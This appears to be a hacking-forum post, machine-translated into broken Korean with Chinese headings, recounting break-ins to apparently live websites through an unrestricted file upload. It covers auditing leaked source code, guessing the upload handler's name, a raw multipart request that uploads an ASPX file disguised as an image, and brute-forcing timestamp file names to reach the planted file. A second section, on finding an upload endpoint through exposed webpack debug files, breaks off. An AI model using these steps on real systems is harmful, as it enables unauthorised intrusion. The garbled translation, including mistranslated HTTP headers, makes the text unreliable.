KoreanHackerTeam
Moderator
0x01 站点1:文件上传
发现源代码泄露
매운 닭고기 사전을 열고 스캔하고 bin.zip 정보 유출이 있는지 확인하고 코드 감사를 수행하십시오.파일 위치 : simpledataplatform.simpledataplatform.fileupload
요청을 받으려면 ProcessRequest를 찾으십시오. 여러 매개 변수를 얻은 후 (초기화) 핸들 파일 메소드
처리를위한 후속 핸들 파일. DateType=ZBJHSB 인 경우 요청이 처리됩니다. DateType은 GET 매개 변수입니다.
경로는/업로드/setData/ZBJHSB이고, str 이름은 타임 스탬프이고, str2 (접미사)는 제한없이 저장됩니다.
좋아, 이것은 모든 파일의 완전한 업로드 여야합니다. 반환 값이있는 한 사이트가 사라질 것입니다. 그러나 불행히도 그는 가치를 반환하지 않았습니다.
Method fileUpload이므로 파일 이름이 추측됩니다
FileUpload.aspx
fileUpload.ASHX
FileUpload.asmx
FileUploads.aspx
FileUploads.asmx
fileUploads.ASHX
업로드 . 및 기타 기존 사전 버스트, 파일 이름 http://xxx.com:6039/fileUploads.ashx를 성공적으로 찾았습니다.
업로드 양식을 직접 구성하십시오. 여기 양식의 이름 필드는 설정되지 않아야합니다 (코드에서는 찾을 수 없음). 패키지를 보내면 200이 반환됩니다. 어쩌면 업로드되었을 것입니다.
post /fileuploads.ashx?datatype=zbjhsb http /1.1
Host: XXX.CN:6039
컨텐츠 길이 : 195
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Applewebkit/537.36 (Gecko와 같은 KHTML) Chrome/93.0.4577.82 Safari/537.36
x- Quested-with: xmlhttprequest
컨텐츠 -TYPE: 멀티 파트/형태 데이터; 경계=--- webKitFormboundarysvkajfiouerxhsu8
accept: */*
Connection: 닫기
----- WebKitFormBoundarysvkajfiouerxhsu8
Content-Disposition: Form-Data; 이름='파일'; filename='1.aspx'
내용 -TYPE: 이미지/JPEG
11111111111111
----- WebKitFormBoundarysvkajfiouerxhsu8--
우리는 이전에 사용 된 형식이 파일 이름으로 yyyymmddhhmmssfff 인 다음 접미사를 Ext로 직접 가로 채 었다는 것을 알았습니다. 그리고 우리는 특정 경로가 있으므로 사이트를 얻기 위해 타임 스탬프 파일 이름 만 파열하면됩니다. 우리는 전에 이것을하지 않았으므로 시도해 볼 수도 있습니다.
爆破时间戳
PowerShell을 사용하여 타임 스탬프를 생성 한 다음 Go를 누르십시오.PowerShell -C get -date -format yyyymmddhhmmssfff
다음 5 자리, 즉 SSFFFF (컴퓨터의 시간이 반드시 정확하지 않기 때문에 6 자리조차 폭발 할 수 있기 때문에)
내가 얼마나 오래 기다렸는지 모르겠습니다
나는 운이 좋다. 나는 다음에 무엇을 말하지 않을 것이다.
0x02 站点2:文件上传
找到上传接口
웹 사이트 http://xxxx3:880/zwwpt/#/닫히지 않은 WebPackDebug 모드가 있음을 찾으십시오. JS를 확인하여 업로드 인터페이스를 찾으십시오
http://